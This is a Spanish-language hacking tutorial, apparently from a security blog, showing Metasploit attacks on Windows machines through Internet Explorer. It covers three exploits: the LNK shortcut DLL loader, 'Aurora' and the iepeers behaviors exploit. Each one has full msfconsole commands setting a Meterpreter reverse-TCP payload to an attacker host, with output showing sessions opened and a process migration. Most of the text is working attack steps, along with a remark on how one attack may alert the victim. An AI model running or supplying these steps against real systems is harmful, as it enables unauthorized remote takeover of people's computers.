CONCEPTOS BASICOS DE PENETRACION EN MAQUINAS BAJO PLATAFORMA WINDOWS XP/VISTA/7 USANDO METASPLOIT FRAMEWORK – Parte II
Shortcut_icon_dllloader IE 6.0, IE 7.0, IE 8.0
Este exploit intenta aprovechar una vulnerabilidad en la manipulación de accesos directos de windows (.LNK) que contienen un icono que apunta a una DLL maliciosa. La ejecución de este exploit creará un servicio WebDAV en la maquina del atacante para la ejecución de un payload arbitrario cuando la víctima intenta acceder como recurso UNC.
| msf> use exploit/windows/browser/ms10_046_shortcut_icon_dllloadermsf exploit(ms10_046_shortcut_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.1.34 LHOST => 192.168.1.34 msf exploit(ms10_046_shortcut_icon_dllloader) > set LPORT 4450 LPORT => 4450 msf exploit(ms10_046_shortcut_icon_dllloader) > show options Module options (exploit/windows/browser/ms10_046_shortcut_icon_dllloader): Name Current Setting Required Description —- ————— ——– ———– SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 80 yes The daemon port to listen on (do not change) UNCHOST no The host portion of the UNC path to provide to clients (ex: 1.2.3.4). URIPATH / yes The URI to use (do not change). Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description —- ————— ——– ———– EXITFUNC process yes Exit technique: seh, thread, none, process LHOST 192.168.1.34 yes The listen address LPORT 4450 yes The listen port Exploit target: Id Name — —- 0 Automatic msf exploit(ms10_046_shortcut_icon_dllloader) > exploit [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.34:4450 [*] [*] Send vulnerable clients to \\192.168.1.34\nXdeLrAW\. [*] Or, get clients to save and render the icon of http://<your host>/<anything>.lnk [*] [*] Using URL: http://0.0.0.0:80/ [*] Local IP: http://192.168.1.34:80/ [*] Server started. |
Una vez el usuario ingresa al servicio que MetaSploit ha iniciado, comienza el ataque intentando abrir una conexión Meterpreter contra el objetivo, sin embargo, este ataque en particular puede alertar al usuario, dado que automáticamente se crea un recurso compartido con la maquina remota del atacante y el usuario podrá ver claramente en dicho directorio las DLL compartidas, por esta razón se recomienda prudencia con su uso.
| msf exploit(ms10_046_shortcut_icon_dllloader) >[*] Sending UNC redirect to 192.168.1.36:49381 …
[*] Responding to WebDAV OPTIONS request from 192.168.1.36:49384 [*] Received WebDAV PROPFIND request from 192.168.1.36:49384 / [*] Sending directory multistatus for / … [*] Received WebDAV PROPFIND request from 192.168.1.36:49384 / [*] Sending directory multistatus for / … [*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW [*] Sending 301 for /nXdeLrAW … [*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW/ [*] Sending directory multistatus for /nXdeLrAW/ … [*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW [*] Sending 301 for /nXdeLrAW … [*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW/ [*] Sending directory multistatus for /nXdeLrAW/ … [*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW [*] Sending 301 for /nXdeLrAW … [*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW/ [*] Sending directory multistatus for /nXdeLrAW/ … [*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW/desktop.ini [*] Sending 404 for /nXdeLrAW/desktop.ini … [*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW [*] Sending 301 for /nXdeLrAW … [*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW/ [*] Sending directory multistatus for /nXdeLrAW/ … [*] Sending LNK file to 192.168.1.36:49384 … [*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW/cufAOBP.dll.manifest [*] Sending 404 for /nXdeLrAW/cufAOBP.dll.manifest … [*] Sending DLL payload 192.168.1.36:49384 … [*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW/cufAOBP.dll.123.Manifest [*] Sending 404 for /nXdeLrAW/cufAOBP.dll.123.Manifest … [*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW/cufAOBP.dll.124.Manifest [*] Sending 404 for /nXdeLrAW/cufAOBP.dll.124.Manifest … [*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW/cufAOBP.dll.2.Manifest [*] Sending 404 for /nXdeLrAW/cufAOBP.dll.2.Manifest … [*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW [*] Sending 301 for /nXdeLrAW … [*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW/ [*] Sending directory multistatus for /nXdeLrAW/ … [*] Sending stage (749056 bytes) to 192.168.1.36 [*] Meterpreter session 3 opened (192.168.1.34:4450 -> 192.168.1.36:49385) at Fri May 13 00:56:37 +0200 2011 [*] Responding to WebDAV OPTIONS request from 192.168.1.36:49384 [*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW [*] Sending 301 for /nXdeLrAW … [*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW/ [*] Sending directory multistatus for /nXdeLrAW/ … |
AURORA
Se trata de un exploit que aprovecha la vulnerabilidad Aurora encontrada en navegadores IE 6.X y 7.X sobre el uso inadecuado de la pila de memoria, donde se accede a posiciones de memoria sin inicializar permitiendo al atacante inyectar código malicioso a dichas direcciones de memoria, al igual que otros exploits indicados anteriormente, este inicializa un servicio de MetaSploit que espera a que un cliente inicie la interacción con un navegador vulnerable para ejecutar el ataque.
| msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > set URIPATH / URIPATH => / msf exploit(ms10_002_aurora) > set LHOST 192.168.1.34 LHOST => 192.168.1.34 msf exploit(ms10_002_aurora) > exploit [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.34:4444 [*] Using URL: http://0.0.0.0:8080/ [*] Local IP: http://192.168.1.34:8080/ [*] Server started. msf exploit(ms10_002_aurora) > [*] Sending Internet Explorer «Aurora» Memory Corruption to client 192.168.1.38 [*] Sending stage (749056 bytes) to 192.168.1.38 [*] Meterpreter session 1 opened (192.168.1.34:4444 -> 192.168.1.38:1094) at Fri May 13 22:47:19 +0200 2011 sessions meterpreter> |
IEPEERS
Se trata de una vulnerabilidad incluida en las funcionalidades de “comportamiento” DHTML de Internet Explorer versiones 6.X y 7.X, esta vulnerabilidad es conocida como “IEPEERS” dado que se encuentra localizada específicamente en la DLL “iepeers.dll” a lo que Microsoft respondió que era necesario restringir el acceso a dicha librería, con lo que en versiones superiores a la 7 de IE este exploit ya no funciona como se espera.
| msf > use exploit/windows/browser/ms10_018_ie_behaviorsmsf exploit(ms10_018_ie_behaviors)> show options
Module options (exploit/windows/browser/ms10_018_ie_behaviors): Name Current Setting Required Description —- ————— ——– ———– SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) Exploit target: Id Name — —- 0 (Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista msf exploit(ms10_018_ie_behaviors) > set URIPATH / URIPATH => / msf exploit(ms10_018_ie_behaviors) > set SRVPORT 8081 SRVPORT => 8081 msf exploit(ms10_018_ie_behaviors) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms10_018_ie_behaviors) > set LHOST 192.168.1.34 LHOST => 192.168.1.34 msf exploit(ms10_018_ie_behaviors) > set LPORT 4441 LPORT => 4441 msf exploit(ms10_018_ie_behaviors) > exploit [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.34:4441 [*] Using URL: http://0.0.0.0:8081/ [*] Local IP: http://192.168.1.34:8081/ [*] Server started. msf exploit(ms10_018_ie_behaviors) > [*] Sending Internet Explorer DHTML Behaviors Use After Free to 192.168.1.38:1130 (target: IE 6 SP0-SP2 (onclick))… [*] Sending stage (749056 bytes) to 192.168.1.38 [*] Meterpreter session 2 opened (192.168.1.34:4441 -> 192.168.1.38:1138) at Fri May 13 23:02:01 +0200 2011 [*] Session ID 2 (192.168.1.34:4441 -> 192.168.1.38:1138) processing InitialAutoRunScript ‘migrate -f’ [*] Current server process: IEXPLORE.EXE (1372) [*] Spawning a notepad.exe host process… [*] Migrating into process ID 1264 [*] New server process: notepad.exe (1264)
|
Seguridad en Sistemas y Técnicas de Hacking. TheHackerWay (THW) 